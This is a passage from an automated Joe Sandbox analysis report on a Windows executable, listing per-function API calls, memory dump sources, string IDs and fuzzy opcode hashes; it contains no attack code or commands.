                                                                                         • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Similarity
                                                                                        • API ID: std::bad_alloc::bad_alloc
                                                                                        • String ID:
                                                                                        • API String ID: 1875163511-0
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 1203560049-0
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 3118131910-0
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 1203560049-0
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 1703294689-0
                                                                                        APIs
                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6FE18F895
                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6FE18F89B
                                                                                          • Part of subcall function 00007FF6FE193EC8: FindClose.KERNEL32(?,?,00000000,00007FF6FE1A0811), ref: 00007FF6FE193EFD
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                                                        • String ID:
                                                                                        • API String ID: 3587649625-0
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 3668304517-0
                                                                                        APIs
                                                                                        • SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF6FE19274D), ref: 00007FF6FE1928A9
                                                                                        • GetLastError.KERNEL32(?,00007FF6FE19274D), ref: 00007FF6FE1928B8
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastPointer
                                                                                        • String ID:
                                                                                        • API String ID: 2976181284-0
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: Item_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 1746051919-0
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: File$BuffersFlushTime
                                                                                        • String ID:
                                                                                        • API String ID: 1392018926-0
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: LoadString
                                                                                        • String ID:
                                                                                        • API String ID: 2948472770-0
                                                                                        • Opcode ID: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                                                                                        • Instruction ID: cfcf177912ebda7be002e9751db7d3ef48a66c573a91c948cd9204314cfa56c1
                                                                                        • Opcode Fuzzy Hash: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                                                                                        • Instruction Fuzzy Hash: 83114F61F08A5285E700CF17A8441697BA1BBE8FD0F544535EA2EE3BA4EF7CE5518344
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastPointer
                                                                                        • String ID:
                                                                                        • API String ID: 2976181284-0
                                                                                        • Opcode ID: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                                                                                        • Instruction ID: 0a924dc8e39341a8f6f81dd7c52fe6be76a985abf4fdcd611eeeffaeabc3643e
                                                                                        • Opcode Fuzzy Hash: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                                                                                        • Instruction Fuzzy Hash: C0116621E0864181FB60CB26E44166D6A50FBE5BA4F544331FA7D966D8EF3CE592C300
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: ItemRectTextWindow$Clientswprintf
                                                                                        • String ID:
                                                                                        • API String ID: 3322643685-0
                                                                                        • Opcode ID: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                                                                                        • Instruction ID: 49b4b16e48707fa4a9581746c53916f79093e076078c2674e58b22d3e8aecaac
                                                                                        • Opcode Fuzzy Hash: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                                                                                        • Instruction Fuzzy Hash: 5E01B160E0D64B41FF4ADB53A4682BA1F916FE5740F080032F82D866D9FE6CF985C300
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6FE19EBAD,?,?,?,?,00007FF6FE195752,?,?,?,00007FF6FE1956DE), ref: 00007FF6FE19EB5C
                                                                                        • GetProcessAffinityMask.KERNEL32 ref: 00007FF6FE19EB6F
                                                                                        Similarity
                                                                                        • API ID: Process$AffinityCurrentMask
                                                                                        • String ID:
                                                                                        • API String ID: 1231390398-0
                                                                                        • Opcode ID: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                                                                        • Instruction ID: e3a6573e25e804eb265285eb0adacb32d6b1aa53d43cb174ea8fdfb41e22d8d1
                                                                                        • Opcode Fuzzy Hash: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                                                                        • Instruction Fuzzy Hash: B5E06561F1458646DB59CB5AC8915EE67D2BFD8B40F848036E60BC3658EE2DE5458B00
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                        • String ID:
                                                                                        • API String ID: 1173176844-0
                                                                                        • Opcode ID: 14867973fed18b2c44dc58e1bcd5f94848bfca26dcf41195b9c376eff134a452
                                                                                        • Instruction ID: 299d420f276d8c67eea961faec1309638e001a79fa79ff66eb47908ccc7dcb88
                                                                                        • Opcode Fuzzy Hash: 14867973fed18b2c44dc58e1bcd5f94848bfca26dcf41195b9c376eff134a452
                                                                                        • Instruction Fuzzy Hash: 96E0BD40E0A10B45FB28B26719261B509405FF93B0E185B30FA3EC87D6BE1CA59AC110
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 485612231-0
                                                                                        • Opcode ID: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                                                                                        • Instruction ID: a2866ead9f66773e097c2ecab2c0829de5c470008dd0085dbc5232441c33fd63
                                                                                        • Opcode Fuzzy Hash: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                                                                                        • Instruction Fuzzy Hash: F6E0B665F0950786FF1CEBB398451B91AA16FF8B55B044034E92EC63D2FE2CA4968A00
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 3668304517-0
                                                                                        • Opcode ID: cc8fab3c86f7d6fe0b03a4b9e3a11541b4bca2b64503b20e80c6e1f24e71eafb
                                                                                        • Instruction ID: 72bd16fb82975544af8c200d7e572f97766f133fc792a3576f8000f7f465e5f5
                                                                                        • Opcode Fuzzy Hash: cc8fab3c86f7d6fe0b03a4b9e3a11541b4bca2b64503b20e80c6e1f24e71eafb
                                                                                        • Instruction Fuzzy Hash: 38D18762F0C68155EB68CB2695402BD7FA1FBA5B84F0C0135EA7D877E5EF38E6618700
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: CompareString_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 1017591355-0
                                                                                        • Opcode ID: a143f18b4ccf410723d5b55495dd87be6177e3dd9b35435d6782b563dee17ef9
                                                                                        • Instruction ID: f6d0b539cda47bf0b430e054db9522837dc780314a4c204608661898f1e7a915
                                                                                        • Opcode Fuzzy Hash: a143f18b4ccf410723d5b55495dd87be6177e3dd9b35435d6782b563dee17ef9
                                                                                        • Instruction Fuzzy Hash: CC61DC11E0C24781FBA4DA27941427E6A91AFE5BD0F144131FE6EA7ACEFE6CE5448221
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF6FE19E948: ReleaseSemaphore.KERNEL32 ref: 00007FF6FE19E974
                                                                                          • Part of subcall function 00007FF6FE19E948: CloseHandle.KERNELBASE ref: 00007FF6FE19E993
                                                                                          • Part of subcall function 00007FF6FE19E948: DeleteCriticalSection.KERNEL32 ref: 00007FF6FE19E9AA
                                                                                          • Part of subcall function 00007FF6FE19E948: CloseHandle.KERNEL32 ref: 00007FF6FE19E9B7
                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6FE1A1ACB
                                                                                        Similarity
                                                                                        • API ID: CloseHandle$CriticalDeleteReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 904680172-0
                                                                                        • Opcode ID: 83a8608da7dc23804aca21668a1faaf692e5e9dd69844c9f3465cc8d5fef8d50
                                                                                        • Instruction ID: 8e79a7ac4c4ea5472b45828d2c7b11d8f3686df96a037a3de82886c0f20d7774
                                                                                        • Opcode Fuzzy Hash: 83a8608da7dc23804aca21668a1faaf692e5e9dd69844c9f3465cc8d5fef8d50
                                                                                        • Instruction Fuzzy Hash: 79618CA2F15A85A2EF08DB66D5540BC6765FB90F90B544232F73E87AC5EF28E464C300
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 3668304517-0
                                                                                        • Opcode ID: d3e9fa35f1103ad580ad4f8a12127b3ececafcbd4c14c285a9c87c65cd680fd4
                                                                                        • Instruction ID: ecd1544252dc06bc228a0f0b019626ecf20a8681ad0584893861540caaa0d4d7
                                                                                        • Opcode Fuzzy Hash: d3e9fa35f1103ad580ad4f8a12127b3ececafcbd4c14c285a9c87c65cd680fd4
                                                                                        • Instruction Fuzzy Hash: 8B518062E0C64250EB14DB2798443AE2F51ABE5BD4F440236FE6D877D6EE3DE585C300
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF6FE193EC8: FindClose.KERNEL32(?,?,00000000,00007FF6FE1A0811), ref: 00007FF6FE193EFD
                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6FE18E993
                                                                                        Similarity
                                                                                        • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 1011579015-0
                                                                                        • Opcode ID: 864680af9fc0f386fe5511f3b68e5025b57726e97162e4a7d041eb2bb48d23ec
                                                                                        • Instruction ID: 86d3583b6cc7ea8383ce56e135840cd54a31be931c82bf41bc4e353e29386dce
                                                                                        • Opcode Fuzzy Hash: 864680af9fc0f386fe5511f3b68e5025b57726e97162e4a7d041eb2bb48d23ec
                                                                                        • Instruction Fuzzy Hash: 30515F22E0C68681FB60DF26984536E2B51FBE5B84F440136FA6D876E9EE3CE581C700
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 3668304517-0
                                                                                        • Opcode ID: d4710ee1c17745c4e2fb2185b683256d00337611548b7710b9c1317264979094
                                                                                        • Instruction ID: ba55c4c96161a2cf6b0d1e909c91c50e006d67e459fceccf1616a4e448893212
                                                                                        • Opcode Fuzzy Hash: d4710ee1c17745c4e2fb2185b683256d00337611548b7710b9c1317264979094
                                                                                        • Instruction Fuzzy Hash: 6F41A262F18A8142FB14DA17A64036EAA51BB94BC0F448536EE6D87F9EEF7CD5918300
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 3668304517-0
                                                                                        • Opcode ID: f5994b23863df56f13e19732c7b5392fac300bbdca5fd5cc38b58261a4c2634e
                                                                                        • Instruction ID: 2219215de757ba4a32e055dcbc60a3cbedb36b5c9da5d30a24e8a6fb0bab55c1
                                                                                        • Opcode Fuzzy Hash: f5994b23863df56f13e19732c7b5392fac300bbdca5fd5cc38b58261a4c2634e
                                                                                        • Instruction Fuzzy Hash: 9541B062E08A0180EB14DB26E54537D2B61EBE5BD8F181235FA6D877DDEE3DE441C600
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                                                        • String ID:
                                                                                        • API String ID: 3947729631-0
                                                                                        • Opcode ID: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                                                                                        • Instruction ID: 752b928dd75737378aac5a64a955e184168eccd9497a1d237cc21881a5b3d012
                                                                                        • Opcode Fuzzy Hash: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                                                                                        • Instruction Fuzzy Hash: C7416F21E19A5282EB64DF1698905B82A51BFF4B40F44443AFA2ED7BE1EE7DF841C740
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                                                                        • String ID:
                                                                                        • API String ID: 680105476-0
                                                                                        • Opcode ID: 6f88c17e658a7e6a764477403b9247f1d27f5880b65831beeeee99c6ba04093e
                                                                                        • Instruction ID: 5ed2984f8543deed216d5e1d5c37ec3a77ced97e803de35dcd005b0a7507edf4
                                                                                        • Opcode Fuzzy Hash: 6f88c17e658a7e6a764477403b9247f1d27f5880b65831beeeee99c6ba04093e
                                                                                        • Instruction Fuzzy Hash: 56218D22F0C65185FB14DA52A4402B96B54ABA5BF0F680B32EE3D87BC1EE7CE2518300
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 3215553584-0
                                                                                        • Opcode ID: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
                                                                                        • Instruction ID: 22e57061fa78715b36bb9191c2987db8c7de1e0979a7377f8621116598215d56
                                                                                        • Opcode Fuzzy Hash: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
                                                                                        • Instruction Fuzzy Hash: 54113A26F5C64286F710DB56A4405B96AA4FBE4380F640536FAADD6BD5EF2CE840C700
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF6FE1AF0A4: GetDlgItem.USER32 ref: 00007FF6FE1AF0E3
                                                                                          • Part of subcall function 00007FF6FE1AF0A4: ShowWindow.USER32 ref: 00007FF6FE1AF109
                                                                                          • Part of subcall function 00007FF6FE1AF0A4: SendMessageW.USER32 ref: 00007FF6FE1AF11E
                                                                                          • Part of subcall function 00007FF6FE1AF0A4: SendMessageW.USER32 ref: 00007FF6FE1AF136
                                                                                          • Part of subcall function 00007FF6FE1AF0A4: SendMessageW.USER32 ref: 00007FF6FE1AF157
                                                                                          • Part of subcall function 00007FF6FE1AF0A4: SendMessageW.USER32 ref: 00007FF6FE1AF173
                                                                                          • Part of subcall function 00007FF6FE1AF0A4: SendMessageW.USER32 ref: 00007FF6FE1AF1B6
                                                                                          • Part of subcall function 00007FF6FE1AF0A4: SendMessageW.USER32 ref: 00007FF6FE1AF1D4
                                                                                          • Part of subcall function 00007FF6FE1AF0A4: SendMessageW.USER32 ref: 00007FF6FE1AF1E8
                                                                                          • Part of subcall function 00007FF6FE1AF0A4: SendMessageW.USER32 ref: 00007FF6FE1AF212
                                                                                          • Part of subcall function 00007FF6FE1AF0A4: SendMessageW.USER32 ref: 00007FF6FE1AF22A
                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6FE1AFD03
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$ItemShowWindow_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 1587882848-0
                                                                                        • Opcode ID: cda69570bdac1a94ff29650853fe264a00bf8ba2677d701060c4dce7484e7aab
                                                                                        • Instruction ID: 81b2596e0b9080cba4652a4cc2e9ad0c78b4dce7899b6a7f9adfeca9612187ad
                                                                                        • Opcode Fuzzy Hash: cda69570bdac1a94ff29650853fe264a00bf8ba2677d701060c4dce7484e7aab
                                                                                        • Instruction Fuzzy Hash: 7801A562E5868541EB20D726D44537E6712EFEDB94F500331FABD867DAFE2CE144C604
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 3668304517-0
                                                                                        • Opcode ID: d36793c31387f104dd38dd6a9dfed600e2c4ae88e6f2c17daf49c6767410ecdf
                                                                                        • Instruction ID: a05514572d86883f5e912276deb7ce7ccb49ca896569e227c87848d82219a9c7
                                                                                        • Opcode Fuzzy Hash: d36793c31387f104dd38dd6a9dfed600e2c4ae88e6f2c17daf49c6767410ecdf
                                                                                        • Instruction Fuzzy Hash: 9D01A1A2E1CA8541EB21DB2AE4412697761FBE9790F445231FAAC47BE5EE2CE1408604
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF6FE1B1604: GetModuleHandleW.KERNEL32(?,?,?,00007FF6FE1B1573,?,?,?,00007FF6FE1B192A), ref: 00007FF6FE1B162B
                                                                                        • DloadProtectSection.DELAYIMP ref: 00007FF6FE1B15C9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: DloadHandleModuleProtectSection
                                                                                        • String ID:
                                                                                        • API String ID: 2883838935-0
                                                                                        • Opcode ID: 902d746097657f35995c40355b3f554eba39218e3fb79a70aefbb70b68ceb6fd
                                                                                        • Instruction ID: bd02f3e2f396c35acfd09909f3545fe57740a75d13b478a3c3e9f4bafe47096a
                                                                                        • Opcode Fuzzy Hash: 902d746097657f35995c40355b3f554eba39218e3fb79a70aefbb70b68ceb6fd
                                                                                        • Instruction Fuzzy Hash: 0111ACE1F08A0681FB60DB4BA8843B11B51AFB5348F190435F92EC67E1FE7CB8958600
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF6FE1940BC: FindFirstFileW.KERNELBASE ref: 00007FF6FE19410B
                                                                                          • Part of subcall function 00007FF6FE1940BC: FindFirstFileW.KERNELBASE ref: 00007FF6FE19415E
                                                                                          • Part of subcall function 00007FF6FE1940BC: GetLastError.KERNEL32 ref: 00007FF6FE1941AF
                                                                                        • FindClose.KERNEL32(?,?,00000000,00007FF6FE1A0811), ref: 00007FF6FE193EFD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$FileFirst$CloseErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 1464966427-0
                                                                                        • Opcode ID: b8896e383a5d1dcda19e37a11711c970bf4128f41c8ad41a5c5cc42cc5e45b14
                                                                                        • Instruction ID: 87d6e5124c5807a7d2c1b03b19d69f8d7d9735b393d6453bee00bad99e5fc20a
                                                                                        • Opcode Fuzzy Hash: b8896e383a5d1dcda19e37a11711c970bf4128f41c8ad41a5c5cc42cc5e45b14
                                                                                        • Instruction Fuzzy Hash: 55F0A462D0824185DB10EF76A1401BD3B609FA5BB4F181335FA3D472CBDE28D454C745
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: File
                                                                                        • String ID:
                                                                                        • API String ID: 749574446-0
                                                                                        • Opcode ID: 7793d0dfaf1bed477703e517dfb550f1e48d00439aedf8bd4eeb9f79e866bcb3
                                                                                        • Instruction ID: 1993edc2bd49e95720ddabf265f9800cf8b7e64e5a659217e07838687ab2f279
                                                                                        • Opcode Fuzzy Hash: 7793d0dfaf1bed477703e517dfb550f1e48d00439aedf8bd4eeb9f79e866bcb3
                                                                                        • Instruction Fuzzy Hash: 80E08C12F2052582FF24EB6BD8826A81720AFE8B84B481030EE1C873A5DE28D491CA40
                                                                                        APIs
                                                                                        Memory Dump Source
